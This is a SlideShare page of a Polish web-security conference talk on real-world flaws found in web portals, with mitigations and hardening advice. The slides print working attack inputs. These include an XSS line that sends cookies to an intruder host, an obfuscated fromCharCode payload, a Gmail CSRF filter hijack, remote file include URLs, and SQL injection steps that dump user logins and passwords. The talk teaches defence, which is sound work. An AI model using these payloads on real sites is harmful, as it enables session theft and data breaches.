Drobne błędy w portalach
         WWW
 prawdziwe studium przypadku ;-)


  Borys Łącki
  Michał Sobiegraj, CISSP



    Czemu WWW
     jest ważne?
M


    WWW jest wszędzie




M




     Wydajemy pieniądze
     Zarządzamy finansami
     Zarabiamy pieniądze
     Marnujemy czas

M

                    Ruch w Internecie




http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf
M





                2007:
         ilośd ruchu WWW
    przekroczyła ilośd ruchu P2P


M

    WWW pokonało pr0n! YAY!*




          * nie poparte żadnymi badaniami
M

                     Typy ruchu HTTP




http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf
M

    Wzrost ilości hostów w sieci
     Ponad 60 mln aktywnych
               (netcraft)




M


    Bezpieczeostwo
        WWW
       w skrócie
M



    Odkryte podatności WWW
     przewyższają ilościowo
       wszystkie pozostałe
              (Sans)




M


             Czemu?
     Bardzo popularne medium ($)
     Niedojrzałośd technologii
     Błędy logiczne
     Chałup...

       Amerykaoskie ofiary
           phishingu

      3,6 miliona osób, które
    straciły łącznie 3,2 miliarda
       ...

    Standardowa architektura aplikacji WWW

                         Internet




                      Warstwa WWW

   ...

                                              Źle!

                        Internet




         Warstwa WWW

    (filt...
Firewall vs. właściwe                           
    projektowanie, kodowanie i SDLC
                        Internet



...

                                       Optymalnie

                      Internet




                Firewall Aplikacyj...


        Najczęstsze ataki
     PHP Remote File Include
     SQL Injection
     Cross-Site Scripting
     Cross-site...




    Wyciek informacji

B





    Wesoła historyjka ;-)



B





    Więcej obrazków hmm…
B





B





    :-D
B

    Kopiujemy…




B




    Łączymy się…




B





    PWND ;-)
B

     Wniosek?

    Bezpieczeostwo wymaga
     specyficznego sposobu
            myślenia
            (Paranoi? ;-)
B




    Ograniczenie dostępu po stronie klienta
     Możliwośd obejścia interfejsu
     W kontraście z bankomatem

    ...

    Ograniczenie dostępu po stronie klienta
       RSS z identyfikacją ID klienta
        serwer.tld/rss/100_rss.xml
  ...





    Kontrola dostępu po
      stronie serwera


B


    Cross-Site
    Scripting
      (XSS)
B

                                                       Reflective XSS
    Serwer
                     http://serwer/inde...


    Przykładowy kod XSS
    document.write(‘
        <img src=„
           http://intruz.tld/cookiemonster.gif
    ?’+e...

    Zmiana treści za pomocą XSS




M

    Zmiana treści za pomocą XSS




B

              Rebranding za pomocą XSS
    http://strona.tld/topics/%3Cscript%3Eeval(String.fromCharCode(100,111,99,117,...

        Tak to wygląda w kodzie strony
    ...
    <div id="maincontent">
    <h2>Results for: <span style="color:
    #...

          Tak wygląda zmieniany kod


    <div id="logo">
          <div class="logolink">
          <a href="http://str...

    Kod w przeglądarce




M

    Efekt działania




M

    A wygląda to tak




M

    Zmiana treści za pomocą XSS

     Nie jest permanentna
     Lepszy kod  łatwiej (sic!)

    Pomysł:
    Tak samo ...

    Uwierzytelnianie przy pomocy cookies
                POST /login.php HTTP/1.1
                login=user&password=as...

    Wykorzystanie przejętego cookie
             POST /login.php HTTP/1.1
             login=user&password=asd12ed]r3

 ...

    Kradzież ciastka zawierającego ID sesji

    http://www.serwer.tld/index.php?p=com
    ments&comments_login=smietank...





M





M





M

              Jak wysład sobie ciastko?
               XMLHttpRequest
                Problem pomiędzy domenami
       ...

             Co na to poradzid?

     Powiązad ID sesji z IP
     Żądad powtórnego uwierzytelnienia
     Kontrolowad ...

               http://serwer.tld/topics/<img
        src=http://www.serw.tld/images/smiley.gif>




    /
M
http://serwer.tld/topics/<img           
    src=http:%2f%2fwww.ezoterika.pl%2fimages%2fsmiley.gif>




      %2f  /
M
http://serwer.tld/topics/<img       
src=http:%252f%252fwww.serwer.tld%252fimages%252fsm
                         iley.gi...





B

                                                              Stored XSS
       Serwer
                             POST...

               Co można zrobid?
     Permanentna zmiana treści
     Łatwa kradzież ID sesji
     CSRF
     XSS Proxy...




    Kradzież ID sesji




B

                                                     XSS Worm
    Serwer WWW
                      Zapisuje XSS w swoim ...

                                                             XSS Worm
    Serwer WWW
                              Zapis...

                                                          XSS Worm
    Serwer WWW
                           Zapisuje XS...

                Nduja – A Cross Domain/Webmail XSS Worm


    Intruz
                         E-mail                E-ma...

             Co na to poradzid?
     Powiązad ID sesji z IP
     Żądad powtórnego uwierzytelnienia
     Kontrolowad w...


       Cross-Site
    Request Forgery
         (CSRF)
B

                                                                          CSRF
     Serwer
                             ...





    <img src=„http://nasza-
    klasa.pl/invite/1?i=1”>
     (/var/log/apache/cba_ipn_zus_access.log)




B


       Przejęcie wiadomości z Gmail (CSRF)

http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multip
art/form-d...

                 Co na to poradzid?
     POST zamiast GET
       obejście: iframe, javascript
     Referer
       pr...




    PHP File Include

B
Local File Include                               

    • podgląd plików (konfiguracyjnych!)
    • wykonanie kodu, jeśli j...

                                 Remote File Include

     wykonanie kodu
    <?php
    include($mosConfig_absolute_path...

                Co z tym zrobid?
     konfiguracja po stronie php.ini
       allow_url_fopen = Off
       allow_url_inc...




    SQL Injection

M

                                                              SQL Injection
       Serwer
                              ...
POST http://www.serwer.tld/index.php?p=priv HTTP/1.1
                                                              
    p...
priv_search=&cat=1&w_city=Ca%B3a+Polska' and
                                                   
    1=1#&submit=Szukaj

...

    priv_search=&cat=1&w_city=Ca%B3a+Polska' and
    1=0#&submit=Szukaj




M

       priv_search=&cat=1&w_city=Ca%B3a+Polska'
       union all select @@version#&submit=Szukaj




    The used SELECT...

    priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select
    1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version#&s...

    priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select
    1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15,16,17,18#&s...
priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select   
    1,2,3,TABLE_SCHEMA,5,6,7,8,9,10,TABLE_NAME,12,COLUMN_
  ...
priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select
                                                                ...

    Przy okazji wychodzą na jaw
           TAJEMNICE ;-)




M
Bonusowe odkrycie:
                           
    1836 botów :-)




M

    Blind SQL Injection




               Formularz rejestracyjny:


B
                          ‘

            Blind SQL Injection
     1' and 1='0
           OK.
     1' or 1='1
           Taki email już jest zarej...





B





B

               Blind SQL Injection

    • /zgoda.php?id=155765%20AND%20(select%2
      0ascii(substring((select%20login%...

     Wyniki blind SQL Injection


     Opóźnienie
     Treśd
     Komunikat błędu

B

              Co na to poradzid?

     Filtrowad wprowadzane dane
     - Białe listy znaków
     - Spójnośd (IDS, Firew...




    Podsumowanie

M

     Z bezpieczeostwem WWW jest źle




    Błędy są wszędzie* wokół nas


                *no prawie wszędzie ;-)
M

               Co zrobid?

    Koniecznie filtrowad wprowadzane i
           wyprowadzane dane

             Firewalle ...

      Byd świadomym potencjalnych
          zagrożeo i problemów

     Słuchad i pytad
     Korzystad z pomocy specjal...

             Używad sprawdzonych
                  rozwiązao
    • Odpowiedzią na tradycyjne błędy jest kod
      zarząd...

                   Hardening

          Poprawna konfiguracja jest
              niezwykle istotna

    Jedna dyrektywa ...

           Myślenie


Nikt ani nic nie ustrzeże nas
  przed skutkami błędów
         logicznych

M
michal@sobiegraj.com
       b.lacki@logicaltrust.net




Pytania?
Upcoming SlideShare
Loading in …5
×

Drobne błędy w portalach WWW -- prawdziwe studium przypadku

699
-1

Published on

Published in: Technology, Design
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
699
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
0
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Drobne błędy w portalach WWW -- prawdziwe studium przypadku

  1. 1. Drobne błędy w portalach WWW prawdziwe studium przypadku ;-) Borys Łącki Michał Sobiegraj, CISSP
  2. 2.  Czemu WWW jest ważne? M
  3. 3.  WWW jest wszędzie M
  4. 4.   Wydajemy pieniądze  Zarządzamy finansami  Zarabiamy pieniądze  Marnujemy czas M
  5. 5.  Ruch w Internecie http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf M
  6. 6.  2007: ilośd ruchu WWW przekroczyła ilośd ruchu P2P M
  7. 7.  WWW pokonało pr0n! YAY!* * nie poparte żadnymi badaniami M
  8. 8.  Typy ruchu HTTP http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf M
  9. 9.  Wzrost ilości hostów w sieci Ponad 60 mln aktywnych (netcraft) M
  10. 10.  Bezpieczeostwo WWW w skrócie M
  11. 11.  Odkryte podatności WWW przewyższają ilościowo wszystkie pozostałe (Sans) M
  12. 12.  Czemu?  Bardzo popularne medium ($)  Niedojrzałośd technologii  Błędy logiczne  Chałupnicze rozwiązania M
  13. 13.  Amerykaoskie ofiary phishingu 3,6 miliona osób, które straciły łącznie 3,2 miliarda dolarów (Gartner, http://www.heise-online.pl/news/item/2356/) M
  14. 14.  Standardowa architektura aplikacji WWW Internet Warstwa WWW (filtry wejścia/wyjścia) Warstwa Aplikacji (logika biznesowa) Serwer Baz Danych M
  15. 15.  Źle! Internet Warstwa WWW (filtry wejścia/wyjścia) Nowa funkcjonalnośd Warstwa Aplikacji (logika biznesowa) Serwer Baz Danych M
  16. 16. Firewall vs. właściwe  projektowanie, kodowanie i SDLC Internet Firewall Aplikacyjny Warstwa WWW (filtry wejścia/wyjścia) Nowa funkcjonalnośd Warstwa Aplikacji (logika biznesowa) Serwer Baz Danych M
  17. 17.  Optymalnie Internet Firewall Aplikacyjny Warstwa WWW (filtry wejścia/wyjścia) Warstwa Aplikacji Nowa funkcjonalnośd (logika biznesowa) Serwer Baz Danych M
  18. 18.  Najczęstsze ataki  PHP Remote File Include  SQL Injection  Cross-Site Scripting  Cross-site Request Forgery (SANS Top-20 2007 Security Risks, 2007 Annual Update) M
  19. 19.  Wyciek informacji B
  20. 20.  Wesoła historyjka ;-) B
  21. 21.  Więcej obrazków hmm… B
  22. 22.  B
  23. 23.  :-D B
  24. 24.  Kopiujemy… B
  25. 25.  Łączymy się… B
  26. 26.  PWND ;-) B
  27. 27.  Wniosek? Bezpieczeostwo wymaga specyficznego sposobu myślenia (Paranoi? ;-) B
  28. 28.  Ograniczenie dostępu po stronie klienta  Możliwośd obejścia interfejsu  W kontraście z bankomatem Nieskuteczne! B
  29. 29.  Ograniczenie dostępu po stronie klienta  RSS z identyfikacją ID klienta serwer.tld/rss/100_rss.xml serwer.tld/rss/101_rss.xml serwer.tld/rss/102_rss.xml  Czytanie cudzych wiadomości serwer.tld/index.php?p=ok&action=msgs2&msgs_id=80 serwer.tld/index.php?p=ok&action=msgs2&msgs_id=81 serwer.tld/index.php?p=ok&action=msgs2&msgs_id=82 B
  30. 30.  Kontrola dostępu po stronie serwera B
  31. 31.  Cross-Site Scripting (XSS) B
  32. 32.  Reflective XSS Serwer http://serwer/index.php?id=<script>…</script> GET /index.php? id=<script>…</script> HTTP/1.1 Aplikacja Intruz WWW Użytkownik …<script>…</script>… exec(…) Dane dostępne w kontekście użytkownika B
  33. 33.  Przykładowy kod XSS document.write(‘ <img src=„ http://intruz.tld/cookiemonster.gif ?’+escape(document.cookie) +’ ”> ’); B
  34. 34.  Zmiana treści za pomocą XSS M
  35. 35.  Zmiana treści za pomocą XSS B
  36. 36.  Rebranding za pomocą XSS http://strona.tld/topics/%3Cscript%3Eeval(String.fromCharCode(100,111,99,117, 109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40, 34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77,76,61,34,60,105,10 9,103,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,101,122,1 11,116,101,114,105,107,97,46,112,108,47,105,109,97,103,101,115,47,115,109,1 05,108,101,121,46,103,105,102,39,62,34));%3C%252fscript%3E document.getElementById("logo").innerHTML= "<img src='http://www.str.tld/images/smiley.gif'>" M
  37. 37.  Tak to wygląda w kodzie strony ... <div id="maincontent"> <h2>Results for: <span style="color: #f00;"><script>eval(String.fromCharCode(100,111,99,117,109,101 ,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,1 00,40,34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77 ,76,61,34,60,105,109,103,32,115,114,99,61,39,104,116,116,112,5 8,47,47,119,119,119,46,101,122,111,116,101,114,105,107,97,46,1 12,108,47,105,109,97,103,101,115,47,115,109,105,108,101,121,4 6,103,105,102,39,62,34));</script></span></h2> </div> ... M
  38. 38.  Tak wygląda zmieniany kod <div id="logo"> <div class="logolink"> <a href="http://strona.tld/">strona.tld</a> </div> ... </div> M
  39. 39.  Kod w przeglądarce M
  40. 40.  Efekt działania M
  41. 41.  A wygląda to tak M
  42. 42.  Zmiana treści za pomocą XSS  Nie jest permanentna  Lepszy kod  łatwiej (sic!) Pomysł: Tak samo wyglądający formularz kierujący dane w inne miejsce  phishing B
  43. 43.  Uwierzytelnianie przy pomocy cookies POST /login.php HTTP/1.1 login=user&password=asd12ed]r3 HTTP/1.1 OK 200 Set-cookie: user_id=734223s8uod42 Witaj user Użytkownik GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42 Serwer Witaj user B
  44. 44.  Wykorzystanie przejętego cookie POST /login.php HTTP/1.1 login=user&password=asd12ed]r3 HTTP/1.1 OK 200 Set-cookie: user_id=734223s8uod42 Witaj user Użytkownik GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42 Serwer Witaj user GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42 Intruz Witaj user B
  45. 45.  Kradzież ciastka zawierającego ID sesji http://www.serwer.tld/index.php?p=com ments&comments_login=smietanka%3Csc ript%3Edocument.write(document.cookie) %3C/script%3E PHPSESSID=gji9h519llgbgbnaqg7si0q1l0; __utma=258102041.949163972.1198624259.1198624259.1198624259.1; __utmb=258102041; __utmc=258102041; __utmz=258102041.1198624259.1.1.utmccn=(direct)|utmcsr=(direct)|utmc md=(none) M
  46. 46.  M
  47. 47.  M
  48. 48.  M
  49. 49.  Jak wysład sobie ciastko?  XMLHttpRequest Problem pomiędzy domenami  Link img, iframe, location.href, etc Przykład: <img src="http://serwer.tld/cookiemonster.gif?PHPSESSID%3Dgji9h519llgbgbnaqg7 si0q1l0%3B%20__utma%3D258102041.949163972.1198624259.1198624259. 1198624259.1%3B%20__utmb%3D258102041%3B%20__utmc%3D25810204 1%3B%20__utmz%3D258102041.1198624259.1.1.utmccn%3D%28direct%29 %7Cutmcsr%3D%28direct%29%7Cutmcmd%3D%28none%29"> B
  50. 50.  Co na to poradzid?  Powiązad ID sesji z IP  Żądad powtórnego uwierzytelnienia  Kontrolowad wprowadzane dane !!! - Białe listy (ScRipT) - Spójnośd (IDS, Firewall, aplikacja) - Dogłębnośd (....//  ../), UTF-7 B
  51. 51.  http://serwer.tld/topics/<img src=http://www.serw.tld/images/smiley.gif> / M
  52. 52. http://serwer.tld/topics/<img  src=http:%2f%2fwww.ezoterika.pl%2fimages%2fsmiley.gif> %2f  / M
  53. 53. http://serwer.tld/topics/<img  src=http:%252f%252fwww.serwer.tld%252fimages%252fsm iley.gif> %252f  %2f  / M
  54. 54.  B
  55. 55.  Stored XSS Serwer POST /register.php HTTP/1.1 login=<script>…</script>&password=asd Aplikacja WWW GET /index.php HTTP/1.1 <script>…</script> Użytkownik …<script>…</script>… Intruz exec(…) Baza danych Dane dostępne w kontekście użytkownika B
  56. 56.  Co można zrobid?  Permanentna zmiana treści  Łatwa kradzież ID sesji  CSRF  XSS Proxy  Automatyczne robaki - mySpace, Orkut, Nduja, Borys Łatwe ;] w serwisach pozwalających publikowad własną treśd: - aukcyjne, blogi, fora, etc B
  57. 57.  Kradzież ID sesji B
  58. 58.  XSS Worm Serwer WWW Zapisuje XSS w swoim profilu Intruz XSS … Intruz User_1 User_2 B
  59. 59.  XSS Worm Serwer WWW Zapisuje XSS w swoim profilu GET /intruz/ HTTP/1.1 User_1 Intruz XSS …<script>…</script>… … exec(…) Zapisuje XSS w swoim profilu Intruz User_1 XSS User_2 B
  60. 60.  XSS Worm Serwer WWW Zapisuje XSS w swoim profilu GET /intruz/ HTTP/1.1 User_1 Intruz XSS …<script>…</script>… User_2 … Zapisuje XSS w exec(…) swoim profilu Intruz GET /user1/ HTTP/1.1 User_1 XSS …<script>…</script>… Zapisuje XSS w exec(…) User_2 XSS swoim profilu B
  61. 61.  Nduja – A Cross Domain/Webmail XSS Worm Intruz E-mail E-mail E-mail E-mail Serwer Serwer Serwer Serwer WWW WWW WWW WWW WebMail WebMail WebMail WebMail Libero.it Tiscali.it Lycos.it Excite.com B
  62. 62.  Co na to poradzid?  Powiązad ID sesji z IP  Żądad powtórnego uwierzytelnienia  Kontrolowad wprowadzane dane - Białe listy (ScRipT) - Spójnośd (IDS, Firewall, aplikacja) - Dogłębnośd (....//  ../), UTF-7  Filtrowad dane zapisywane do bazy i odczytywane z bazy B
  63. 63.  Cross-Site Request Forgery (CSRF) B
  64. 64.  CSRF Serwer http://serwer/delete.php?id=34 Aplikacja WWW GET /delete.php?id=34 HTTP/1.1 Cookie: user_id=734223s8uod42 … id = 34; Intruz delete(id); Użytkownik … Wpis usunięty M
  65. 65.  <img src=„http://nasza- klasa.pl/invite/1?i=1”> (/var/log/apache/cba_ipn_zus_access.log) B
  66. 66.  Przejęcie wiadomości z Gmail (CSRF) http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multip art/form-data&_action=https%3A//mail.google.com/mail/h/ wt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@maili nator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_atta ch=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter „Konto na Gmailu każdy z nas ma. Mam i ja!” (Kradzież domeny: www.davidairey.co.uk) B
  67. 67.  Co na to poradzid?  POST zamiast GET  obejście: iframe, javascript  Referer  problemy: proxy, przeglądarki, zmiana nagłówka  Generowane tymczasowego dodatkowego ID  Powiązanie ID użytkownika z długim losowym ciągiem  Trzymane po stronie serwera  Wymaganie ponownej autoryzacji przy kluczowych operacjach  Brak błędów XSS (XmlHttpRequest)!!! B
  68. 68.  PHP File Include B
  69. 69. Local File Include  • podgląd plików (konfiguracyjnych!) • wykonanie kodu, jeśli jest możliwośd wgrania pliku na serwer • dostęp do kodu źródłowego <?php if(file_exists("includes/$page.inc")) { include "includes/$page.inc"; } else { echo "W budowie!<BR>"; } http://XXXXX.art.pl/p.php?page=../../../../../../../../../home/user1/publi c_html/.htpasswd%00 B
  70. 70.  Remote File Include wykonanie kodu <?php include($mosConfig_absolute_path."/administrator/components /com_hashcash/config.hashcash.php"); require_once ($mosConfig_absolute_path.'/components/com_hashcash/CryptoS trategy.php'); http://strona.tld/components/com_hashcash/server.php?mosConfig_a bsolute_path=http://zuozuozuo.pl/evil.txt? access_log:62.48.xxx.xx - - [06/Jan/2008:07:11:06 +0100] "GET //install/index.php?G_PATH=http://www.js2023.pl//modules/PNphpBB2/images/.bash/pr.txt? HTTP/1.1" 404 1021 "-" "libwww-perl/5.803„ access_log:168.212.xxx.xxx - - [06/Jan/2008:22:57:53 +0100] "GET /files/strawberry/plugins/wacko/highlight/html.php?text=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 1021 "-" "libwww-perl/5.76" B
  71. 71.  Co z tym zrobid?  konfiguracja po stronie php.ini allow_url_fopen = Off allow_url_include = Off register_global = Off safe_mode = On register_globals = Off safe_mode_gid = Off display_errors = Off log_errors = On error_log = /var/log/httpd/php_error.log disable_functions = system, shell_exec, exec, passthru  uważad na specjalne znaki (null byte, etc)  filtrowad, filtrowad i jeszcze raz filtrowad (../, UTF, itd.)  inne: mod_security, Suhosin PHP B
  72. 72.  SQL Injection M
  73. 73.  SQL Injection Serwer GET /login.php HTTP/1.1 login=admin&password=1’ or 1=‘1 Aplikacja WWW Intruz select * from users where login=‘admin’ and pass=‘1’ or 1=‘1’ Welcome admin $dane = db_exec(„select from users where Baza danych login=‘$login’ and pass=‘$pass’”) if ($dane.count) { print („Welcome $login”) … } else { print („Bye”); exit (0); } M
  74. 74. POST http://www.serwer.tld/index.php?p=priv HTTP/1.1  priv_search=2e332424&cat='"1&w_city="'asd&submit=Szukaj M
  75. 75. priv_search=&cat=1&w_city=Ca%B3a+Polska' and  1=1#&submit=Szukaj M
  76. 76.  priv_search=&cat=1&w_city=Ca%B3a+Polska' and 1=0#&submit=Szukaj M
  77. 77.  priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select @@version#&submit=Szukaj The used SELECT statements have a different number of columns M
  78. 78.  priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version#&submi t=Szukaj M
  79. 79.  priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15,16,17,18#&submi t=Szukaj M
  80. 80. priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select  1,2,3,TABLE_SCHEMA,5,6,7,8,9,10,TABLE_NAME,12,COLUMN_ NAME,14,15,16,17,18 from information_schema.columns where TABLE_SCHEMA != 'mysql' and TABLE_SCHEMA != 'information_schema'#&submit=Szukaj M
  81. 81. priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select  1,2,3,login,5,6,7,8,9,10,pass,12,sex,14,15,16,17,18 from users#&submit=Szukaj M
  82. 82.  Przy okazji wychodzą na jaw TAJEMNICE ;-) M
  83. 83. Bonusowe odkrycie:  1836 botów :-) M
  84. 84.  Blind SQL Injection Formularz rejestracyjny: B ‘
  85. 85.  Blind SQL Injection  1' and 1='0  OK.  1' or 1='1  Taki email już jest zarejestrowany w serwisie. Musisz podad inny  1' union all SELECT IF( user() like '%sig%', BENCHMARK(3000000,MD5( 'x' )),NULL)#  opóźnienie  user() == sig@...  1' union all SELECT IF( user() like '%asd%', BENCHMARK(3000000,MD5( 'x' )),NULL)#  brak opóźnienia B
  86. 86.  B
  87. 87.  B
  88. 88.  Blind SQL Injection • /zgoda.php?id=155765%20AND%20(select%2 0ascii(substring((select%20login%20from%20a dmini%20limit%201,1),1,1)))%3D97 • id=155765 AND (select ascii(substring((select login from admini limit LINIA,1), MIEJSCE, 1))) =ZNAK_ASCII B
  89. 89.  Wyniki blind SQL Injection  Opóźnienie  Treśd  Komunikat błędu B
  90. 90.  Co na to poradzid?  Filtrowad wprowadzane dane - Białe listy znaków - Spójnośd (IDS, Firewall, aplikacja, baza danych)  Nie ufad filtrom po stronie użytkownika (listy wyboru, JavaScript) M
  91. 91.  Podsumowanie M
  92. 92.  Z bezpieczeostwem WWW jest źle Błędy są wszędzie* wokół nas *no prawie wszędzie ;-) M
  93. 93.  Co zrobid? Koniecznie filtrowad wprowadzane i wyprowadzane dane  Firewalle aplikacyjne  IDSy Białe listy! M
  94. 94.  Byd świadomym potencjalnych zagrożeo i problemów  Słuchad i pytad  Korzystad z pomocy specjalistów  Bilansowad koszty z zyskami każdy feedback jest dobry M
  95. 95.  Używad sprawdzonych rozwiązao • Odpowiedzią na tradycyjne błędy jest kod zarządzany, automatyczne typowanie, GC, itp. • Odpowiedzią na błędy w kodowaniu WWW są frameworki – Pozwalają na zachowanie pewnej jakości kodu – Nie jesteśmy w 100% bezpieczni » Jeszcze nie są wystarczająco dojrzałe » Nie wszyscy wiedzą jak z nich korzystad » Bywają rozszerzane "na głupa" » Efekt skali powoduje, że błędy propagują się szeroko M
  96. 96.  Hardening Poprawna konfiguracja jest niezwykle istotna Jedna dyrektywa w php.ini może zablokowad wykorzystanie błędu w aplikacji PHP: http://www.sans.org/top20/#s1 M
  97. 97.  Myślenie Nikt ani nic nie ustrzeże nas przed skutkami błędów logicznych M
  98. 98. michal@sobiegraj.com b.lacki@logicaltrust.net Pytania?
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×